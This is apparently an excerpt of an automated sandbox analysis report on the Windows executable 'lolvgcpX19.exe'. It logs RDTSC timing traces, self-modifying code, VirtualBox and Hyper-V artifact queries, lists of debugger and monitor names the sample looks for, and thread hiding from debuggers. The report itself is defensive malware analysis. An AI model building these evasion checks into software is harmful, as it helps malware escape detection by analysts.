Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D900FB second address: 6D90154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7B98E54831h 0x00000014 add cl, FFFFFFA6h 0x00000017 jmp 00007F7B98E54831h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F7B98E54830h 0x00000023 or ecx, 419BA848h 0x00000029 jmp 00007F7B98E5482Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90154 second address: 6D9015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D9015A second address: 6D901C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F7B98E54836h 0x00000011 push eax 0x00000012 jmp 00007F7B98E5482Bh 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F7B98E54836h 0x0000001d xchg eax, esi 0x0000001e jmp 00007F7B98E54830h 0x00000023 push eax 0x00000024 jmp 00007F7B98E5482Bh 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d movzx eax, di 0x00000030 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D901C9 second address: 6D90260 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B99161527h 0x00000008 or cl, 0000005Eh 0x0000000b jmp 00007F7B99161529h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ecx, 123B8827h 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b movzx esi, di 0x0000001e jmp 00007F7B99161525h 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007F7B99161521h 0x0000002a xchg eax, edi 0x0000002b jmp 00007F7B9916151Eh 0x00000030 mov edi, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7B99161527h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90260 second address: 6D90333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F7B98E5482Ch 0x00000018 sbb ax, BDA8h 0x0000001d jmp 00007F7B98E5482Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F7B98E54838h 0x00000029 jmp 00007F7B98E54835h 0x0000002e popfd 0x0000002f popad 0x00000030 lock bts dword ptr [edi], 00000000h 0x00000035 pushad 0x00000036 mov cx, E313h 0x0000003a mov edx, esi 0x0000003c popad 0x0000003d jc 00007F7C09416978h 0x00000043 jmp 00007F7B98E54832h 0x00000048 pop edi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov dx, 0FB0h 0x00000050 pushfd 0x00000051 jmp 00007F7B98E54839h 0x00000056 sbb si, 1336h 0x0000005b jmp 00007F7B98E54831h 0x00000060 popfd 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90333 second address: 6D90389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov ch, 64h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F7B9916151Bh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, edx 0x00000017 pushfd 0x00000018 jmp 00007F7B99161527h 0x0000001d add esi, 434ABDCEh 0x00000023 jmp 00007F7B99161529h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90389 second address: 6D903AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B98E5482Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC07C0 second address: 6DC07C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB0967 second address: 6DB0984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB0984 second address: 6DB09CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 20F2h 0x00000007 mov cx, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov esi, 4D793333h 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F7B9916151Bh 0x00000024 sub ch, FFFFFF9Eh 0x00000027 jmp 00007F7B99161529h 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB09CD second address: 6DB09D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC09CB second address: 6DC09E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC09E8 second address: 6DC09EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC09EE second address: 6DC09F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC09F2 second address: 6DC0A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7B98E54832h 0x00000015 xor ecx, 50CF4D48h 0x0000001b jmp 00007F7B98E5482Bh 0x00000020 popfd 0x00000021 jmp 00007F7B98E54838h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A4D second address: 6DC0A7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7B99161526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A7B second address: 6DC0A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A7F second address: 6DC0A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0A85 second address: 6DC0AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 mov bl, F0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7B98E54832h 0x00000015 adc ah, FFFFFF98h 0x00000018 jmp 00007F7B98E5482Bh 0x0000001d popfd 0x0000001e movzx eax, di 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 call 00007F7B98E5482Bh 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0AC8 second address: 6DC0AE4 instructions: 0x00000000 rdtsc 0x00000002 mov di, 010Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7B9916151Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0AE4 second address: 6DC0B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7B98E54835h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0B45 second address: 6DC0B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DC0B4B second address: 6DC0B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E309F7 second address: 6E30A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B99161523h 0x00000008 pushfd 0x00000009 jmp 00007F7B99161528h 0x0000000e xor esi, 0EAF6408h 0x00000014 jmp 00007F7B9916151Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F7C096A6CCDh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F7B99161522h 0x0000002c add ax, 8668h 0x00000031 jmp 00007F7B9916151Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E30A68 second address: 6E30A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 mov ecx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bh, 39h 0x00000012 jmp 00007F7B98E54834h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E30A8F second address: 6E30ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B99161521h 0x00000009 adc esi, 20B709E6h 0x0000000f jmp 00007F7B99161521h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7B99161529h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10DDA second address: 6E10E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B98E54833h 0x00000013 jmp 00007F7B98E54833h 0x00000018 popfd 0x00000019 mov ax, 633Fh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E28 second address: 6E10E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B9916151Bh 0x00000009 and cl, 0000000Eh 0x0000000c jmp 00007F7B99161529h 0x00000011 popfd 0x00000012 mov ah, E1h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F7B9916151Ah 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E6B second address: 6E10E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F7B98E54836h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E96 second address: 6E10E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E10E9A second address: 6E10EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E204F9 second address: 6E20583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop edi 0x0000000c mov eax, 610ACB03h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007F7B99161526h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F7B99161520h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F7B9916151Eh 0x0000002a and al, 00000028h 0x0000002d jmp 00007F7B9916151Bh 0x00000032 popfd 0x00000033 mov edx, esi 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a call 00007F7B99161521h 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20583 second address: 6E205F2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B98E54831h 0x00000008 adc si, 89F6h 0x0000000d jmp 00007F7B98E54831h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 pushfd 0x00000017 jmp 00007F7B98E54837h 0x0000001c sub esi, 0E255F2Eh 0x00000022 jmp 00007F7B98E54839h 0x00000027 popfd 0x00000028 pop eax 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E205F2 second address: 6E205F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E205F6 second address: 6E2060E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E2060E second address: 6E20657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7B99161524h 0x00000011 xor ecx, 1A35C238h 0x00000017 jmp 00007F7B9916151Bh 0x0000001c popfd 0x0000001d mov ah, 40h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edx, 1AA3BAB2h 0x00000029 mov bx, CFFEh 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20657 second address: 6E206C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B98E54838h 0x00000013 adc eax, 101466F8h 0x00000019 jmp 00007F7B98E5482Bh 0x0000001e popfd 0x0000001f mov ax, 742Fh 0x00000023 popad 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx ebx, si 0x0000002d pushfd 0x0000002e jmp 00007F7B98E54838h 0x00000033 adc esi, 29E13088h 0x00000039 jmp 00007F7B98E5482Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E206C9 second address: 6E20781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F7B99161520h 0x0000000c or ecx, 26DF92E8h 0x00000012 jmp 00007F7B9916151Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b sub ecx, ecx 0x0000001d jmp 00007F7B9916151Fh 0x00000022 xchg eax, edi 0x00000023 jmp 00007F7B99161526h 0x00000028 push eax 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7B99161521h 0x00000030 sbb al, 00000066h 0x00000033 jmp 00007F7B99161521h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F7B99161520h 0x0000003f adc ax, DA08h 0x00000044 jmp 00007F7B9916151Bh 0x00000049 popfd 0x0000004a popad 0x0000004b xchg eax, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F7B99161525h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20781 second address: 6E207E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B98E54837h 0x00000008 mov esi, 057B714Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, 00000001h 0x00000015 jmp 00007F7B98E54832h 0x0000001a lock cmpxchg dword ptr [esi], ecx 0x0000001e jmp 00007F7B98E54830h 0x00000023 mov ecx, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7B98E54837h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E207E9 second address: 6E2084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B9916151Fh 0x00000009 adc ecx, 69ABCB1Eh 0x0000000f jmp 00007F7B99161529h 0x00000014 popfd 0x00000015 jmp 00007F7B99161520h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d cmp ecx, 01h 0x00000020 pushad 0x00000021 mov bl, F3h 0x00000023 popad 0x00000024 jne 00007F7C096932AEh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F7B9916151Eh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E2084E second address: 6E20852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20852 second address: 6E20858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20858 second address: 6E208C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov ch, dh 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 call 00007F7B98E54832h 0x00000015 mov ah, CCh 0x00000017 pop edx 0x00000018 push ecx 0x00000019 pushfd 0x0000001a jmp 00007F7B98E54833h 0x0000001f or esi, 4B2A4D4Eh 0x00000025 jmp 00007F7B98E54839h 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d pop ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E208C4 second address: 6E208C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E208C8 second address: 6E208CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E208CE second address: 6E20907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B99161521h 0x00000009 add cx, 1836h 0x0000000e jmp 00007F7B99161521h 0x00000013 popfd 0x00000014 mov edi, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20907 second address: 6E2090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\lolvgcpX19.exeSpecial instruction interceptor: First address: 181C2E6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exeSpecial instruction interceptor: First address: 181AE6F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exeSpecial instruction interceptor: First address: 165F0A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exeSpecial instruction interceptor: First address: 1661B04 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exeSpecial instruction interceptor: First address: 18A28A5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01169980 rdtsc 0_2_01169980
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F829FF
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: lolvgcpX19.exe, 00000000.00000003.2200351560.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: lolvgcpX19.exeBinary or memory string: Hyper-V RAW
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: lolvgcpX19.exe, 00000000.00000003.2294457217.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294618317.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294486811.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311467990.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294224463.00000000006B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8N15
Source: lolvgcpX19.exe, 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\lolvgcpX19.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\lolvgcpX19.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\lolvgcpX19.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile opened: NTICE
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile opened: SICE
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\lolvgcpX19.exeProcess queried: DebugPortJump to behavior
